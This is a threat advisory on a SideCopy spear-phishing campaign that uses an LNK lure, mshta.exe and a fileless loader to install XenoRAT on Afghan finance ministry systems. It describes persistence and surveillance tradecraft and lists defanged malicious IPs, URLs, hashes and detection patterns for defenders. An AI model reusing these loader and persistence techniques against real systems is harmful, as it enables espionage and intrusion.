Attack Report · Threat Advisory · Amber · June 02, 2026
Operation XENOFISCAL: SideCopy adopts XenoRAT to target Afghan finance
Pakistan-linked APT SideCopy executed a precision spear-phishing campaign against Afghanistan's Ministry of Finance and its 34 provincial revenue directorates, deploying the open-source XenoRAT v1.8.7 remote access trojan through a fileless, multi-stage loader chain.
01 — Summary
What happened
SideCopy — a Pakistan-linked advanced persistent threat cluster also tracked as UNC2269, White Dev 55, Mocking Draco, and TAG-140 — executed Operation XENOFISCAL, a targeted spear-phishing campaign directed at Afghanistan's Ministry of Finance and its provincial revenue and finance directorates across all 34 Mustoufiats. The attack delivered a malicious Windows shortcut (LNK) file inside a ZIP archive, using a Pashto-language lure themed around an intellectual and psychological warfare seminar to deceive provincial finance officials.
Execution of the LNK abused the legitimate Windows binary mshta.exe to kick off a multi-stage, largely fileless loader chain that ultimately deployed XenoRAT v1.8.7 — an open-source remote access trojan. The XenoRAT implant beaconed to bulletproof European hosting infrastructure kept deliberately separate from the Afghan-hosted delivery layer, providing the SideCopy APT with encrypted command-and-control, comprehensive surveillance capability, and long-term persistent access to compromised Windows hosts.
02 — Attack details
How the attack unfolded
Operation XENOFISCAL is a deliberate, intelligence-led operation underpinned by precise knowledge of Afghan administrative structure, a stealthy fileless delivery path, and a surveillance-capable implant engineered for quiet, persistent access.
SideCopy initiated the Operation XENOFISCAL campaign with a targeted spear-phishing message delivering a ZIP archive containing a malicious Windows shortcut (LNK) file. The LNK was disguised with a PDF icon and a carefully crafted Pashto-language filename referencing an employee list for an intellectual and psychological warfare seminar — a lure tailored precisely to provincial finance officials. The level of organisational specificity across all 34 Afghan Mustoufiats indicates prior intelligence gathering by the SideCopy APT group against Afghan government finance targets.
When the victim opens the LNK, it silently launches mshta.exe from the System32 directory and directs it at a remote PHP resource hosted on a compromised Afghan education domain (abimj.edu.af). This living-off-the-land binary (LOLBIN) technique executes externally hosted script content directly in memory without writing an executable to disk. The URL was padded with excessive comma obfuscation to defeat static and signature-based detection. While the malicious chain proceeds in the background, the victim is shown a convincing decoy — an Afghan Ministry of Finance provincial staff directory covering all 34 provinces, written in Dari and Pashto — whose organisational depth confirms prior SideCopy intelligence collection.
The final payload is XenoRAT v1.8.7, an open-source remote access trojan. On execution, XenoRAT establishes an encrypted TCP command-and-control channel to a hard-coded IP address and enforces single-instance execution via a mutex named clouda. The implant supports SOCKS5 proxy tunnelling and dynamic in-memory DLL loading through Assembly.Load. Persistence is reinforced via a scheduled task named XenoUpdateManager running at the highest available privileges, with a non-admin fallback writing to HKCU\Software\Microsoft\Windows\CurrentVersion\Run under value Edgre. The implant can cleanly self-delete via a hidden cmd.exe routine when instructed by the operator.
XenoRAT's post-exploitation capability set is built for comprehensive surveillance and host reconnaissance: keylogging, screen capture, clipboard monitoring, webcam and microphone capture, file upload/download/deletion, antivirus enumeration via WMI, and arbitrary command execution. C2 infrastructure is hosted on bulletproof European servers kept entirely separate from the Afghan-hosted delivery layer, providing operational compartmentalisation and long-term resilience for the SideCopy campaign against Afghan Ministry of Finance targets.
03 — Actor details
SideCopy APT — threat actor profile
SideCopy is a Pakistan-linked advanced persistent threat cluster active since at least 2019, conducting precision spear-phishing campaigns against South Asian government, defence, and finance sectors.
- Attribution — Pakistan-linked
- Active since — 2019
- Targeted regions — Afghanistan (confirmed); South Asia (broader)
- Targeted sectors — Government, Finance, Public administration, Defence
- Known capabilities — Spear-phishing, LOLBIN abuse, fileless loaders, open-source RAT adoption, bulletproof C2 infrastructure
04 — Recommendations
What to do now
Prioritised response actions for security and operations teams. Action 1 should begin immediately on any suspected host.
On suspected hosts, remove the registry value Edgre under HKCU\Software\Microsoft\Windows\CurrentVersion\Run and delete the scheduled task XenoUpdateManager. Inspect and clear the staging directories C:\Users\Public\USOShared-1de48789-1285 and C:\Users\Public\firefx-1de87eec8-1241. Remove residual artifacts: zuidrt.hta, noway.bat, ayui.vmxx, and ayhui.vmxx.
Alert on mshta.exe executing with HTTP or HTTPS URL arguments — particularly remote index.php endpoints — and on mshta.exe spawned by explorer.exe or as a child of an LNK execution. This process lineage is the earliest reliable detection point for the Operation XENOFISCAL spear-phishing chain.
Build detection content for the loader tradecraft in this XenoRAT chain: RWX memory allocation via VirtualAlloc followed by CreateThread, .NET BinaryFormatter deserialization, AmsiScanBuffer patching, COMPLUS_Version environment-variable manipulation, and reflective Assembly.Load of in-memory payloads.
Deploy WDAC or AppLocker rules to restrict or block execution of mshta.exe and HTA files where not operationally required. Disable or tightly limit Windows Script Host, ActiveX, and legacy Internet Explorer script-host functionality that the JScript loader chain depends on to execute XenoRAT's fileless delivery.
05 — Indicators of compromise
IoCs — Operation XENOFISCAL / XenoRAT
Block or monitor all indicators below across network controls, endpoint detection, and SIEM pipelines. All domains and IPs are defanged.
- 194B912C242604D6F9A79369F22338C58A13CE0CC2ED280CE505075808BC2F14
- 3B4194BDFE40D94031A94B30397FFD8A4B09D0A4057668E897B8BDCD1703DD01
- DF9173A28C0B0B878C10A53D35CD7CE6F6ED66D207B6B7C4FF723721F1C027AB
- A63E90EE57A1F213A8FE76EF1A6CFF5AE9ED7EBCEDA258431533825E648C0C67
- 5833917BD137804F5A021D2CB37ADFE5C4B7B67DBB06D59C3B9C5CF393835E45
- 99127C8C67D90E2776BEEB85281F9C68399BF4567B07A6B638D68B760212E88D
- 8F2D979EF33B2900351C94C7335275A9342C75189E1A901998E90A539E944A1A
- 0019212F25EB04BBB33BB194879C095265DB7855D6003BDD777CF0CBB90EB772
- 9AE3D785486022AF82EA92E51B26E3F55C1BBA88A7BE2AD9790F4240E8499D14
- abimj[.]edu[.]af
- 185[.]235[.]137[.]106
- 103[.]132[.]98[.]224
- 103[.]132[.]98[.]226
- 103[.]132[.]98[.]0/23
- hxxp[:]//abimj[.]edu[.]af/index[.]php
- hxxp[:]//abimj[.]edu[.]af/institute/cloudiyaf/document[.]pdf
- hxxp[:]//abimj[.]edu[.]af/institute/cloudiya/
- hxxps[:]//abimj[.]edu[.]af/institute/10/
- hxxps[:]//abimj[.]edu[.]af/institute/7/
- ugayt.hta
- noway.bat
- zuidrt.hta
- WayBroad.dll
- Aotestpass.dll
- ayui.vmxx
- ayhui.vmxx
- C:\Users\Public\USOShared-1de48789-1285\zuidrt.hta
- C:\Users\Public\firefx-1de87eec8-1241
- Mutex — clouda
- Registry — HKCU\Software\Microsoft\Windows\CurrentVersion\Run · value: Edgre
- Scheduled task — XenoUpdateManager
06 — MITRE ATT&CK TTPs
Tactics, techniques & sub-techniques
Full MITRE ATT&CK mapping for Operation XENOFISCAL / SideCopy XenoRAT campaign.
07 — References
